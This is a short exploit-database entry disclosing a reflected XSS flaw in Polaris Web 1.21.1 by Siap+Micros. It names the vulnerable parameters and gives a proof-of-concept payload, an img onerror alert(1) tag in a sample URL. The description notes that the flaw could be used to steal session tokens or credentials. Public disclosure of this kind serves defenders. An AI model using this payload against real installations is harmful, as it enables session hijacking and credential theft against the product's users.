Exploit Title: Polaris Web 1.21.1 - Reflected XSS
# Exploit Author: mahdi eidi
# Date: 2023-07-09
# Vendor: Siap+Micros S.p.A.
# Technology: PHP
# Vendor Homepage: https://www.siapmicros.com/en/application/
# Tested on: kali linux
# Impact: Manipulate the content java script of the site
## Description
An attacker can inject his own malicious JavaScript code into vulnerable parameters and can also perform various actions, such as stealing the victim's session token or other users' login credentials.
# Technical Details & POC
1- login in web site 
2- fine parameter inject RXSS[destination,format,daily_day,sort...]
3- payload '"><img/src/onerror=alert(1)>'
4- sampel path [https://exampel.com/polaris/custom-synoptic?format= RXSS Payload Inject]
5- GET send Request
6- Bom! alert payload

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.